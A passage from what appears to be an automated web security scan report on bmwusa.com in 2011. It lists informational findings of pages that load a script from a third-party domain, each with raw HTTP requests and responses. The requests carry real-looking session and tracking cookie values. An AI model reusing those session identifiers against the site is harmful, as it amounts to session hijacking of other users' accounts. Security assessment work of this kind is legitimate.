Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:41 GMT;path=/
Content-Length: 212741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.199. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:53 GMT;path=/
Content-Length: 228844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.200. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:37 GMT;path=/
Content-Length: 228845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.201. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:25 GMT;path=/
Content-Length: 216305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.202. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:11 GMT;path=/
Content-Length: 216306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.203. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:08 GMT;path=/
Content-Length: 201935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.204. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:27 GMT;path=/
Content-Length: 257095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.205. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:25 GMT;path=/
Content-Length: 231691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.206. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:15 GMT;path=/
Content-Length: 231692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.207. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:30 GMT;path=/
Content-Length: 215290


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.208. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:06 GMT;path=/
Content-Length: 215291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.209. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:49:41 GMT;path=/
Content-Length: 202033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.210. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:37 GMT;path=/
Content-Length: 212053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.211. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:26:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:46:00 GMT;path=/
Content-Length: 212054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.212. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
